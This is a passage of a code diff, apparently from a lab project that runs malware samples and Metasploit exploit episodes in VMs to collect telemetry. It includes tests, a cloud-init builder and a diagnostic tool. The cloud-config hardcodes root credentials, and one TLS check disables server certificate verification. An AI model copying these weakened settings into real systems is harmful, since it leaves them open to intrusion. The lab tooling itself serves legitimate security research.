+    client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(
+            target_ip="10.200.0.10",
+            session_open_timeout_s=0.5,
+            sample_store_root=tmp_path,  # empty
+        ),
+        emit_event=lambda *a, **kw: None,
+        sample=sample,
+    )
+    # Mimic workload selected because the binary isn't staged.
+    assert driver.workload is not None
+    assert driver.workload.profile == "bursty-c2"
+    assert "real:" not in driver.workload.profile
+
+
+# ---------------------------------------------------------------------------
+# Fetcher input validation
+# ---------------------------------------------------------------------------
+
+
+def test_fetch_sample_rejects_bad_sha(tmp_path: Path) -> None:
+    from tools.fetch_sample import fetch_sample
+
+    with pytest.raises(ValueError, match="64 hex chars"):
+        fetch_sample("not-a-hash", tmp_path, api_key="x")
+
+
+def test_fetch_sample_returns_existing_when_hash_matches(tmp_path: Path) -> None:
+    from tools.fetch_sample import fetch_sample
+
+    payload = b"already staged bytes"
+    sha = hashlib.sha256(payload).hexdigest()
+    p = tmp_path / sha
+    p.write_bytes(payload)
+    # api_key is unused on the cached path; pass anything.
+    out = fetch_sample(sha, tmp_path, api_key="ignored")
+    assert out == p
+    # File untouched.
+    assert p.read_bytes() == payload
--- a/tests/test_vm_load_controller.py
+++ b/tests/test_vm_load_controller.py
@ -0,0 +1,213 @@
+"""Tests for VMLoadController against a fake SerialClient.
+
+The controller's only job is to translate phases into shell commands
+on a serial console + emit audit events. The key invariants we
+encode here come from the elliott-lab incident, where every phase
+showed a median of 20% CPU because the workload silently never fired:
+
+  - every set_phase emits some event (so absence in events.jsonl is
+    a hard signal)
+  - infected_running emits workload_started AFTER sending the load
+    command
+  - dormant emits workload_killed WITH a pre_kill_probe so trainers
+    can detect "the workload was never running"
+  - exceptions in the shell call surface as workload_failed; they
+    do NOT propagate (the runner's on_phase callback would swallow
+    them anyway, but we want the audit row regardless)
+"""
+
+from __future__ import annotations
+
+import sys
+from pathlib import Path
+
+import pytest
+
+# Mirror the same path hack run_real_vm_demo.py uses so the tools/
+# module imports work.
+ROOT = Path(__file__).resolve().parent.parent
+sys.path.insert(0, str(ROOT))
+sys.path.insert(0, str(ROOT / "tools"))
+
+from samples.manifest import Sample  # noqa: E402
+from vm_load_controller import VMLoadController  # noqa: E402
+
+
+class FakeSerial:
+    """Records every shell command. Returns canned probe output."""
+
+    def __init__(self, probe_response: str = "yes=1\nsh=1\nloadavg=0.45") -> None:
+        self.calls: list[str] = []
+        self.probe_response = probe_response
+        self.fail_on: list[str] = []
+
+    def run(self, cmd: str, timeout_s: float = 10.0) -> str:
+        self.calls.append(cmd)
+        for substr in self.fail_on:
+            if substr in cmd:
+                raise RuntimeError(f"fake-serial: failing on {substr!r}")
+        if "pgrep -c yes" in cmd or "pgrep -c sh" in cmd or "loadavg" in cmd:
+            return self.probe_response
+        return ""
+
+
+# ---------------------------------------------------------------------------
+# Event emission — the audit trail
+# ---------------------------------------------------------------------------
+
+
+def test_setup_emits_workload_setup_event() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.setup()
+    names = [e for e, _ in events]
+    assert "workload_setup" in names
+    setup = next(kw for e, kw in events if e == "workload_setup")
+    assert setup["profile"] == "v1-yes"  # no Sample → fallback path
+    assert setup["sample"] is None
+
+
+def test_setup_records_profile_when_sample_present() -> None:
+    serial = FakeSerial()
+    s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.setup()
+    setup = next(kw for e, kw in events if e == "workload_setup")
+    assert setup["profile"] == "cpu-saturate"
+    assert setup["sample"] == "x"
+
+
+def test_infected_running_emits_workload_started_after_command() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("infected_running")
+
+    # The command was sent.
+    assert any("yes > /dev/null" in cmd for cmd in serial.calls), \
+        f"expected v1 yes-loop in serial calls; got {serial.calls}"
+    # And the audit event followed it.
+    started = [kw for e, kw in events if e == "workload_started"]
+    assert started, "workload_started event must fire"
+    assert started[0]["phase"] == "infected_running"
+    assert started[0]["profile"] == "v1-yes"
+
+
+def test_dormant_probes_before_killing() -> None:
+    """The pre_kill_probe is the load-bearing diagnostic: it tells the
+    trainer whether the workload was actually running before we
+    killed it. If pgrep returns 0 yes processes, the previous
+    infected_running was a no-op and the episode is filterable."""
+    serial = FakeSerial(probe_response="yes=2\nsh=1\nloadavg=1.32")
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("dormant")
+
+    killed = [kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant"]
+    assert killed, "dormant must emit workload_killed"
+    probe = killed[0].get("pre_kill_probe")
+    assert probe is not None
+    assert probe["yes"] == "2"
+    assert probe["loadavg"] == "1.32"
+
+
+def test_dormant_probe_records_zero_when_workload_never_ran() -> None:
+    """The exact symptom from elliott-lab: dormant probe shows 0
+    yes processes → trainer can flag this episode as workload-not-firing."""
+    serial = FakeSerial(probe_response="yes=0\nsh=1\nloadavg=0.18")
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("dormant")
+    killed = next(kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant")
+    assert killed["pre_kill_probe"]["yes"] == "0"
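+
+
+# Illustrative sketch only: parsing the "key=value" probe text that FakeSerial
+# returns into the string-valued dict the assertions above read. The helper
+# name is hypothetical; VMLoadController's real parser may differ.
+def _sketch_parse_probe(text: str) -> dict[str, str]:
+    probe: dict[str, str] = {}
+    for line in text.splitlines():
+        key, sep, value = line.partition("=")
+        if sep:  # skip lines without "=" such as shell noise
+            probe[key.strip()] = value.strip()
+    return probe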
+
+
+def test_clean_phase_emits_workload_killed() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("clean")
+    assert any(
+        e == "workload_killed" and kw["phase"] == "clean" for e, kw in events
+    ), "clean must emit workload_killed"
+
+
+def test_armed_emits_workload_armed_with_handshake_command() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("armed")
+    assert any("armed-handshake" in cmd for cmd in serial.calls)
+    assert any(e == "workload_armed" for e, _ in events)
+
+
+def test_infecting_emits_workload_infecting_with_dd() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("infecting")
+    assert any("dd if=/dev/urandom" in cmd for cmd in serial.calls)
+    assert any(e == "workload_infecting" for e, _ in events)
+
+
+# ---------------------------------------------------------------------------
+# Exception handling — failures must surface as events, not propagate
+# ---------------------------------------------------------------------------
+
+
+def test_command_failure_emits_workload_failed_and_does_not_raise() -> None:
+    """If serial.run() raises (timeout, EOF, bad login), the
+    runner would otherwise silently swallow the exception. We want
+    a hard audit row in events.jsonl regardless."""
+    serial = FakeSerial()
+    serial.fail_on = ["yes > /dev/null"]
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    # Must NOT raise.
+    c.set_phase("infected_running")
+    failed = [kw for e, kw in events if e == "workload_failed"]
+    assert failed, "expected workload_failed event"
+    assert failed[0]["phase"] == "infected_running"
+    assert "fake-serial" in failed[0]["error"]
+
+
+# ---------------------------------------------------------------------------
+# Profile dispatch — Sample-driven workload picks the right command
+# ---------------------------------------------------------------------------
+
+
+def test_sample_with_profile_uses_workloads_module_command() -> None:
+    """When constructed with a Sample, infected_running runs the
+    profile's start_cmd (from exploits.workloads) — NOT the v1 yes-loop."""
+    s = Sample(name="x", family="X", category="cryptominer", profile="cpu-saturate")
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("infected_running")
+
+    # The sample's workload script + the post-kill yes sweep both ran.
+    # The new workload is profile-shaped, not the simple yes-loop.
+    profile_command_seen = any(".cis490-workload-cpu-saturate" in cmd for cmd in serial.calls)
+    assert profile_command_seen, f"expected workload script in serial calls; got {serial.calls}"
+    started = next(kw for e, kw in events if e == "workload_started")
+    assert started["profile"] == "cpu-saturate"
+    assert started["sample"] == "x"
+
+
+# ---------------------------------------------------------------------------
+# Default emit (no callback supplied) is a no-op
+# ---------------------------------------------------------------------------
+
+
+def test_no_emit_callback_is_safe() -> None:
+    """Tests + code paths that don't pass an emitter shouldn't
+    crash. The default is a no-op lambda."""
+    serial = FakeSerial()
+    c = VMLoadController(serial)
+    # Should not raise.
+    c.setup()
+    c.set_phase("infected_running")
+    c.set_phase("dormant")
+    c.set_phase("clean")
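The probe tests above feed the controller a `key=value` text blob and expect string values back (`probe["yes"] == "2"`). A minimal sketch of that pattern follows, assuming the controller parses the probe roughly this way. `parse_probe`, `RecordingSerial`, and the `"probe"` command string are hypothetical names for illustration, not the repo's actual `FakeSerial` or controller code.

```python
from __future__ import annotations


def parse_probe(text: str) -> dict[str, str]:
    """Parse ``key=value`` lines into a dict, keeping values as strings."""
    probe: dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key:  # skip blank lines and lines without '='
            probe[key] = value
    return probe


class RecordingSerial:
    """Hypothetical test double: records commands, returns a canned probe."""

    def __init__(self, probe_response: str = "") -> None:
        self.probe_response = probe_response
        self.calls: list[str] = []

    def run(self, cmd: str) -> str:
        self.calls.append(cmd)
        return self.probe_response


# Same collector shape the tests use: (event_name, kwargs) tuples.
events: list[tuple[str, dict]] = []


def emit(event: str, **kw) -> None:
    events.append((event, kw))


serial = RecordingSerial("yes=2\nsh=1\nloadavg=1.32")
emit(
    "workload_killed",
    phase="dormant",
    pre_kill_probe=parse_probe(serial.run("probe")),  # placeholder command
)
```

Keeping the values as strings means the audit row records exactly what the guest printed; any numeric interpretation is left to the consumer.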
--- a/tools/build_cidata.py
+++ b/tools/build_cidata.py
@ -28,7 +28,7 @@ from pathlib import Path
 import pycdlib


-DEFAULT_USER_DATA = """\
+DEFAULT_USER_DATA_HEAD = """\
 #cloud-config
 hostname: cis490
 manage_etc_hosts: true
@ -45,10 +45,70 @@ chpasswd:
  list: |
    root:cis490
    cis490:cis490
-runcmd:
-  - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]
 """

+# OpenRC service file shipped inside the guest. Alpine uses OpenRC;
+# the runcmd at the bottom of user-data wires it up on first boot.
+OPENRC_SERVICE = """\
+#!/sbin/openrc-run
+
+description="CIS490 in-guest telemetry agent"
+command="/usr/local/bin/cis490-agent"
+command_args="--port /dev/virtio-ports/cis490.guest.agent"
+command_background=true
+pidfile="/run/cis490-agent.pid"
+output_log="/var/log/cis490-agent.log"
+error_log="/var/log/cis490-agent.log"
+
+depend() {
+    need localmount
+}
+"""
+
+DEFAULT_META_DATA = """\
+instance-id: cis490-vm-001
+local-hostname: cis490
+"""
+
+
+def _indent(text: str, n: int) -> str:
+    pad = " " * n
+    return "\n".join(pad + line if line else line for line in text.splitlines())
+
+
+def build_user_data(*, embed_agent: bool, agent_path: Path | None) -> bytes:
+    """Build a cloud-init user-data document. When ``embed_agent`` is
+    True, also stuff the in-guest agent + an OpenRC service into
+    ``write_files`` and arrange to start the service on first boot."""
+    head = DEFAULT_USER_DATA_HEAD
+    if not embed_agent:
+        return (head + 'runcmd:\n  - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n').encode()
+
+    if agent_path is None:
+        agent_path = Path(__file__).resolve().parent.parent / "vm" / "guest-agent" / "cis490_agent.py"
+    if not agent_path.exists():
+        raise FileNotFoundError(f"agent script not found: {agent_path}")
+    agent_src = agent_path.read_text()
+
+    body = head + (
+        "write_files:\n"
+        "  - path: /usr/local/bin/cis490-agent\n"
+        "    permissions: '0755'\n"
+        "    owner: root:root\n"
+        "    content: |\n"
+        f"{_indent(agent_src, 6)}\n"
+        "  - path: /etc/init.d/cis490-agent\n"
+        "    permissions: '0755'\n"
+        "    owner: root:root\n"
+        "    content: |\n"
+        f"{_indent(OPENRC_SERVICE, 6)}\n"
+        "runcmd:\n"
+        '  - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n'
+        '  - [ sh, -c, "command -v rc-update >/dev/null && rc-update add cis490-agent default || true" ]\n'
+        '  - [ sh, -c, "command -v rc-service >/dev/null && rc-service cis490-agent start || true" ]\n'
+    )
+    return body.encode()
+
 DEFAULT_META_DATA = """\
 instance-id: cis490-vm-001
 local-hostname: cis490
@ -93,11 +153,26 @@ def main() -> int:
        default=None,
        help="path to a custom meta-data file",
    )
+    parser.add_argument(
+        "--no-embed-agent",
+        action="store_true",
+        help="don't bake the in-guest agent into user-data",
+    )
+    parser.add_argument(
+        "--agent-path",
+        type=Path,
+        default=None,
+        help="path to the in-guest agent (default: vm/guest-agent/cis490_agent.py)",
+    )
    args = parser.parse_args()

-    user_data = (
-        args.user_data.read_bytes() if args.user_data else DEFAULT_USER_DATA.encode()
-    )
+    if args.user_data:
+        user_data = args.user_data.read_bytes()
+    else:
+        user_data = build_user_data(
+            embed_agent=not args.no_embed_agent,
+            agent_path=args.agent_path,
+        )
    meta_data = (
        args.meta_data.read_bytes() if args.meta_data else DEFAULT_META_DATA.encode()
    )
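`build_user_data` above indents each embedded file by six spaces so it sits inside a `content: |` YAML block scalar under `write_files`. The sketch below reproduces that indentation helper on its own to show what happens to blank lines and the trailing newline. `write_files_entry` and the `/usr/local/bin/demo` path are hypothetical, used only for illustration.

```python
def indent(text: str, n: int) -> str:
    """Prefix every non-empty line with n spaces; leave blank lines empty."""
    pad = " " * n
    return "\n".join(pad + line if line else line for line in text.splitlines())


def write_files_entry(path: str, content: str) -> str:
    """Render one cloud-init ``write_files`` list item as YAML text."""
    return (
        f"  - path: {path}\n"
        "    permissions: '0755'\n"
        "    content: |\n"
        # Six spaces: two deeper than the four-space keys of the list item.
        f"{indent(content, 6)}\n"
    )


script = "#!/bin/sh\n\necho hello\n"
entry = write_files_entry("/usr/local/bin/demo", script)
print(entry)
```

Because `splitlines()` drops the final newline, the caller appends one explicitly. Blank lines are emitted without padding, which a YAML block scalar accepts, so the embedded script keeps its blank lines without gaining trailing whitespace.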
--- a/tools/cis490_doctor.py
+++ b/tools/cis490_doctor.py
@ -0,0 +1,638 @@
+"""``cis490-doctor`` — single-command diagnostic for a lab host or receiver.
+
+Walks the full bring-up stack from the bottom up and prints a
+green/yellow/red checklist with the exact command that fixes each
+red row. Run this whenever:
+
+  - you just cloned the repo and aren't sure what's missing
+  - you ran install-lab-host.sh but `index.jsonl` on the Pi is empty
+  - somebody filed an issue saying "shipping isn't working"
+
+Usage:
+  uv run python tools/cis490_doctor.py            # human output
+  uv run python tools/cis490_doctor.py --json     # machine-readable
+  uv run python tools/cis490_doctor.py --role lab-host    # default
+  uv run python tools/cis490_doctor.py --role receiver
+
+Exits non-zero if any RED check fails.
+"""
+
+from __future__ import annotations
+
+import argparse
+import dataclasses
+import json
+import os
+import shutil
+import socket
+import ssl
+import subprocess
+import sys
+import tomllib
+from dataclasses import dataclass, field
+from pathlib import Path
+
+
+# ANSI color codes; auto-disable on non-tty.
+def _supports_color() -> bool:
+    return sys.stdout.isatty() and os.environ.get("NO_COLOR") is None
+
+
+_ANSI_GREEN = "\033[32m" if _supports_color() else ""
+_ANSI_YELLOW = "\033[33m" if _supports_color() else ""
+_ANSI_RED = "\033[31m" if _supports_color() else ""
+_ANSI_BOLD = "\033[1m" if _supports_color() else ""
+_ANSI_DIM = "\033[2m" if _supports_color() else ""
+_ANSI_RESET = "\033[0m" if _supports_color() else ""
+
+
+@dataclass
+class Check:
+    name: str
+    status: str  # "ok" | "warn" | "fail" | "skip"
+    detail: str = ""
+    fix: str = ""
+
+    def render(self) -> str:
+        glyph = {
+            "ok":   f"{_ANSI_GREEN}[✓]{_ANSI_RESET}",
+            "warn": f"{_ANSI_YELLOW}[!]{_ANSI_RESET}",
+            "fail": f"{_ANSI_RED}[✗]{_ANSI_RESET}",
+            "skip": f"{_ANSI_DIM}[-]{_ANSI_RESET}",
+        }[self.status]
+        line = f"{glyph} {self.name}"
+        if self.detail:
+            line += f"  {_ANSI_DIM}{self.detail}{_ANSI_RESET}"
+        if self.status == "fail" and self.fix:
+            line += f"\n     {_ANSI_BOLD}fix:{_ANSI_RESET} {self.fix}"
+        return line
+
+
+@dataclass
+class Report:
+    role: str
+    checks: list[Check] = field(default_factory=list)
+
+    def add(self, c: Check) -> None:
+        self.checks.append(c)
+        # Mirror to stdout immediately so a hung check doesn't leave
+        # the operator without partial info.
+        if not _JSON_MODE:
+            print(c.render(), flush=True)
+
+    def to_dict(self) -> dict:
+        return {
+            "role": self.role,
+            "checks": [dataclasses.asdict(c) for c in self.checks],
+            "summary": self.summary(),
+        }
+
+    def summary(self) -> dict:
+        out = {"ok": 0, "warn": 0, "fail": 0, "skip": 0}
+        for c in self.checks:
+            out[c.status] = out.get(c.status, 0) + 1
+        return out
+
+
+_JSON_MODE = False
+
+
+# ---------------------------------------------------------------------------
+# helpers
+# ---------------------------------------------------------------------------
+
+
+def _run(cmd: list[str], *, timeout: float = 5.0) -> tuple[int, str, str]:
+    try:
+        p = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
+        return p.returncode, p.stdout.strip(), p.stderr.strip()
+    except (FileNotFoundError, subprocess.TimeoutExpired) as e:
+        return -1, "", str(e)
+
+
+def _path_exists(p: Path) -> bool:
+    try:
+        return p.exists()
+    except PermissionError:
+        return True  # treat unreadable-but-present as present
+
+
+def _size_str(p: Path) -> str:
+    try:
+        return f"{p.stat().st_size // (1024*1024)} MiB"
+    except (OSError, PermissionError):
+        return "(stat denied — re-run with sudo for size)"
+
+
+# ---------------------------------------------------------------------------
+# checks — repo
+# ---------------------------------------------------------------------------
+
+
+def check_repo(report: Report, repo_root: Path) -> None:
+    if not (repo_root / ".git").exists():
+        report.add(Check(
+            "repo: .git directory present",
+            "warn",
+            detail=f"running from {repo_root} which isn't a git checkout — fine for /opt/cis490 (cp -aT'd) but not the source clone",
+        ))
+        return
+    rc, head, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--short=8", "HEAD"])
+    rc2, branch, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--abbrev-ref", "HEAD"])
+    rc3, dirty, _ = _run(["git", "-C", str(repo_root), "status", "--porcelain"])
+    rc4, log, _ = _run(["git", "-C", str(repo_root), "log", "-1", "--format=%s"])
+    detail = f"{branch}@{head}: {log[:60]}"
+    if branch != "main":
+        report.add(Check(
+            "repo: on main",
+            "warn",
+            detail=detail,
+            fix=f"cd {repo_root} && git fetch && git checkout main && git pull",
+        ))
+    else:
+        report.add(Check("repo: on main", "ok", detail=detail))
+    if dirty:
+        report.add(Check(
+            "repo: tree clean",
+            "warn",
+            detail=f"{len(dirty.splitlines())} modified files",
+        ))
+    else:
+        report.add(Check("repo: tree clean", "ok"))
+
+    rc5, behind, _ = _run(
+        ["git", "-C", str(repo_root), "rev-list", "--count", "HEAD..@{u}"],
+    )
+    if rc5 == 0 and behind.isdigit() and int(behind) > 0:
+        report.add(Check(
+            "repo: up to date with origin",
+            "warn",
+            detail=f"{behind} commits behind",
+            fix=f"cd {repo_root} && git pull",
+        ))
+    elif rc5 == 0:
+        report.add(Check("repo: up to date with origin", "ok"))
+
+
+# ---------------------------------------------------------------------------
+# checks — install
+# ---------------------------------------------------------------------------
+
+
+def check_install(report: Report, role: str) -> None:
+    install_root = Path("/opt/cis490")
+    if not _path_exists(install_root):
+        report.add(Check(
+            "install: /opt/cis490 exists",
+            "fail",
+            fix=f"sudo $(pwd)/scripts/install-{role}.sh",
+        ))
+        return
+    report.add(Check("install: /opt/cis490 exists", "ok"))
+
+    venv_python = install_root / ".venv" / "bin" / "python"
+    if _path_exists(venv_python):
+        rc, ver, _ = _run([str(venv_python), "--version"])
+        report.add(Check("install: venv python", "ok",
+                         detail=ver if rc == 0 else "(unreadable)"))
+    else:
+        report.add(Check(
+            "install: venv python",
+            "fail",
+            fix=f"sudo /opt/cis490/scripts/install-{role}.sh",
+        ))
+
+    cfg_name = "lab-host.toml" if role == "lab-host" else "receiver.toml"
+    cfg = Path("/etc/cis490") / cfg_name
+    if _path_exists(cfg):
+        try:
+            with open(cfg, "rb") as f:
+                tomllib.load(f)
+            report.add(Check(f"config: {cfg}", "ok", detail="parses"))
+        except PermissionError:
+            # Mode 0640 root:cis490 is the install default. Doctor often
+            # runs as the unprivileged user — file is fine, we just
+            # can't read it from here.
+            report.add(Check(
+                f"config: {cfg}",
+                "warn",
+                detail="exists, can't read (mode 0640 root:cis490 — re-run with sudo for full audit)",
+            ))
+        except tomllib.TOMLDecodeError as e:
+            report.add(Check(
+                f"config: {cfg}",
+                "fail",
+                detail=str(e),
+                fix=f"sudo $EDITOR {cfg}",
+            ))
+    else:
+        report.add(Check(
+            f"config: {cfg}",
+            "fail",
+            fix=f"sudo cp /opt/cis490/etc/{cfg_name}.example {cfg}",
+        ))
+
+    if role == "lab-host":
+        env = Path("/etc/cis490/lab-host.env")
+        if _path_exists(env):
+            report.add(Check("config: lab-host.env", "ok"))
+        else:
+            report.add(Check(
+                "config: lab-host.env",
+                "fail",
+                fix="sudo /opt/cis490/scripts/install-lab-host.sh   "
+                    "# regenerates the env file",
+            ))
+
+
+# ---------------------------------------------------------------------------
+# checks — certs (lab-host)
+# ---------------------------------------------------------------------------
+
+
+def check_certs_lab_host(report: Report) -> None:
+    base = Path("/etc/cis490/certs")
+    expected = ["wg-ca.pem", "lab-host.pem", "lab-host.key"]
+    missing = [n for n in expected if not _path_exists(base / n)]
+    if missing:
+        report.add(Check(
+            f"mTLS: certs at {base}",
+            "fail",
+            detail=f"missing: {missing}",
+            fix="On the Pi: sudo /home/max/.env/wg-pki/scripts/"
+                "deploy-cis490-cert.sh <host_id> <this-machine-wg-ip>",
+        ))
+        return
+    # Verify the chain.
+    rc, out, err = _run([
+        "openssl", "verify",
+        "-CAfile", str(base / "wg-ca.pem"),
+        str(base / "lab-host.pem"),
+    ])
+    if rc == 0 and "OK" in out:
+        report.add(Check("mTLS: cert chain validates", "ok",
+                         detail=out.splitlines()[0]))
+    else:
+        report.add(Check(
+            "mTLS: cert chain validates",
+            "fail",
+            detail=err or out,
+            fix="re-issue the leaf via wg-pki/scripts/deploy-cis490-cert.sh",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# checks — services
+# ---------------------------------------------------------------------------
+
+
+def check_services(report: Report, role: str) -> None:
+    services = (
+        ["cis490-receiver"]
+        if role == "receiver"
+        else ["cis490-shipper", "cis490-orchestrator"]
+    )
+    for svc in services:
+        rc, state, _ = _run(["systemctl", "is-active", svc])
+        if state == "active":
+            report.add(Check(f"systemd: {svc} active", "ok"))
+        elif state == "inactive":
+            report.add(Check(
+                f"systemd: {svc} active",
+                "fail",
+                detail="inactive",
+                fix=f"sudo systemctl enable --now {svc}",
+            ))
+        else:
+            report.add(Check(
+                f"systemd: {svc} active",
+                "fail",
+                detail=state or "unknown",
+                fix=f"sudo journalctl -u {svc} --no-pager -n 30",
+            ))
+
+
+# ---------------------------------------------------------------------------
+# checks — network (lab-host)
+# ---------------------------------------------------------------------------
+
+
+def check_network_lab_host(report: Report, cfg_path: Path) -> None:
+    try:
+        with open(cfg_path, "rb") as f:
+            cfg = tomllib.load(f)
+    except (FileNotFoundError, PermissionError, tomllib.TOMLDecodeError) as e:
+        report.add(Check("net: lab-host.toml readable", "fail", detail=str(e)))
+        return
+
+    receiver_url = cfg.get("receiver", {}).get("url", "")
+    if not receiver_url.startswith("https://"):
+        report.add(Check(
+            "net: receiver.url present",
+            "fail",
+            detail=receiver_url,
+            fix=f"edit {cfg_path}: receiver.url = 'https://collector.wg'",
+        ))
+        return
+    # Pull "host[:port]" out of the URL once; https defaults to port 443.
+    netloc = receiver_url.split("//", 1)[1].split("/", 1)[0]
+    host, _, port_str = netloc.partition(":")
+    port = int(port_str) if port_str else 443
+
+    try:
+        ip = socket.gethostbyname(host)
+        report.add(Check(f"net: DNS resolve {host}", "ok",
+                         detail=f"-> {ip}"))
+    except socket.gaierror as e:
+        report.add(Check(
+            f"net: DNS resolve {host}",
+            "fail",
+            detail=str(e),
+            fix=f"echo '10.100.0.1 {host}' | sudo tee -a /etc/hosts   "
+                "# wg-enroll provisions this on real lab hosts",
+        ))
+        return
+
+    try:
+        with socket.create_connection((host, port), timeout=5):
+            report.add(Check(f"net: TCP {host}:{port} reachable", "ok"))
+    except OSError as e:
+        report.add(Check(
+            f"net: TCP {host}:{port} reachable",
+            "fail",
+            detail=str(e),
+            fix="check iptmonads is allowing the WG-side 443 + Caddy is up",
+        ))
+        return
+
+    # mTLS handshake — pull the receiver cert paths from cfg.
+    ca = cfg.get("receiver", {}).get("ca_bundle")
+    cert = cfg.get("receiver", {}).get("client_cert")
+    key = cfg.get("receiver", {}).get("client_key")
+    if not (ca and cert and key):
+        report.add(Check("net: mTLS handshake to collector.wg",
+                         "skip", detail="cert paths not in config"))
+        return
+    try:
+        ctx = ssl.create_default_context(cafile="/home/max/wg-pki/certs/caddy-root.crt"
+                                         if Path("/home/max/wg-pki/certs/caddy-root.crt").exists()
+                                         else None)
+        ctx.load_cert_chain(certfile=cert, keyfile=key)
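+        ctx.check_hostname = False  # must be off before CERT_NONE is allowed
+        ctx.verify_mode = ssl.CERT_NONE  # server cert NOT verified; only our client cert is exercised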
+        with socket.create_connection((host, port), timeout=5) as sock:
+            with ctx.wrap_socket(sock, server_hostname=host) as ssock:
+                report.add(Check("net: mTLS handshake to collector.wg",
+                                 "ok",
+                                 detail=f"cipher={ssock.cipher()[0]}"))
+    except (ssl.SSLError, OSError, FileNotFoundError) as e:
+        report.add(Check(
+            "net: mTLS handshake to collector.wg",
+            "fail",
+            detail=str(e),
+            fix="On the Pi: sudo /home/max/.env/wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip>   "
+                "(rerun cert deploy)",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# checks — VM prereqs (lab-host)
+# ---------------------------------------------------------------------------
+
+
+def check_vm_prereqs(report: Report) -> None:
+    if not _path_exists(Path("/dev/kvm")):
+        report.add(Check(
+            "vm: /dev/kvm",
+            "fail",
+            fix="ensure KVM kernel module is loaded; on x86 hosts: sudo modprobe kvm-intel || sudo modprobe kvm-amd",
+        ))
+    else:
+        report.add(Check("vm: /dev/kvm", "ok"))
+
+    if shutil.which("qemu-system-x86_64") is None:
+        report.add(Check(
+            "vm: qemu-system-x86_64 on PATH",
+            "fail",
+            fix="install qemu-system-x86 via the host package manager",
+        ))
+    else:
+        report.add(Check("vm: qemu-system-x86_64 on PATH", "ok"))
+
+    if shutil.which("zstd") is None:
+        report.add(Check(
+            "vm: zstd on PATH (shipper compression)",
+            "fail",
+            fix="install zstd via the host package manager",
+        ))
+    else:
+        report.add(Check("vm: zstd on PATH (shipper compression)", "ok"))
+
+    images = Path("/var/lib/cis490/vm/images")
+    alpine = images / "alpine-baseline.qcow2"
+    cidata = images / "cidata.iso"
+    if _path_exists(alpine):
+        report.add(Check(f"vm: {alpine}", "ok",
+                         detail=_size_str(alpine)))
+    else:
+        report.add(Check(
+            f"vm: {alpine}",
+            "fail",
+            fix=f"sudo /opt/cis490/scripts/fetch-alpine-baseline.sh {alpine}",
+        ))
+    if _path_exists(cidata):
+        report.add(Check(f"vm: {cidata}", "ok",
+                         detail=_size_str(cidata)))
+    else:
+        report.add(Check(
+            f"vm: {cidata}",
+            "fail",
+            fix=f"sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/build_cidata.py {cidata}",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# checks — Tier 3 (optional)
+# ---------------------------------------------------------------------------
+
+
+def check_tier3(report: Report) -> None:
+    if shutil.which("msfrpcd") is None:
+        report.add(Check(
+            "tier3: msfrpcd on PATH",
+            "warn",
+            detail="optional — only needed for real exploit episodes",
+            fix="sudo /opt/cis490/scripts/install-msfrpcd.sh",
+        ))
+    else:
+        report.add(Check("tier3: msfrpcd on PATH", "ok"))
+
+    # Probe whether msfrpcd is actually listening (tier-3 fleet
+    # dispatch checks the same thing).
+    msfrpcd_listening = False
+    try:
+        with socket.create_connection(("127.0.0.1", 55553), timeout=0.5):
+            msfrpcd_listening = True
+    except OSError:
+        pass
+    if msfrpcd_listening:
+        report.add(Check("tier3: msfrpcd listening on 127.0.0.1:55553", "ok"))
+    else:
+        report.add(Check(
+            "tier3: msfrpcd listening on 127.0.0.1:55553",
+            "warn",
+            detail="optional — fleet falls back to Tier 2 when down",
+            fix="sudo systemctl enable --now cis490-msfrpcd",
+        ))
+
+    # Module catalog parses + at least one same-socket entry.
+    modules_dir = Path("/opt/cis490/exploits/modules")
+    if modules_dir.exists():
+        try:
+            from exploits.modules import load_module_configs as _load
+            catalog = _load(modules_dir)
+            same_socket = [k for k, v in catalog.items() if not v.requires_bridge]
+            report.add(Check(
+                "tier3: module catalog parses",
+                "ok",
+                detail=f"{len(catalog)} modules, {len(same_socket)} same-socket "
+                       f"({len(catalog) - len(same_socket)} need BRIDGE)",
+            ))
+        except Exception as e:
+            report.add(Check(
+                "tier3: module catalog parses",
+                "fail",
+                detail=str(e),
